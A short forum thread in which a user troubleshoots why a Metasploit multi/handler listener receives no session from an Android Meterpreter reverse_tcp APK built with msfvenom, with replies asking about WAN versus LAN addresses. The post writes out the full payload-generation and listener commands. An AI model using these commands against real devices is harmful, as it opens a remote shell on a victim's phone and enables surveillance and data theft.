Forum Thread: Metasploit Doesn't Read/Connect to Android Meterpreter

I've read basically every tutorial and read many posts about problems but can't seem to figure out why.
I create the apk file via metasploit msfvenom

Msfvenom -p android/meterpreter/reverse_tcp LHOST=(MY IP) LPORT=8080(or 4444) R > NAME.APK

I then put The apk onto my phone

Then I started the listener via metasploit by
Use exploit/multi/handler
Set payload android/meterpreter/reverse_tcp
Set LHOST (my IP)
Set LPORT 8080 (or I also tried 4444 on both)
Exploit

Then it starts listening, I then install the apk onto my phone, but metasploit never reads it, does nothing...

I've tried over and over, looked over everything read other forums, could find nothing.
Any help will be greatly appreciated

2 Responses

are you using your wan or lan ip?

nah i am using , virtual box to run kali , so my ip address is different

Share Your Thoughts

  • Hot
  • Active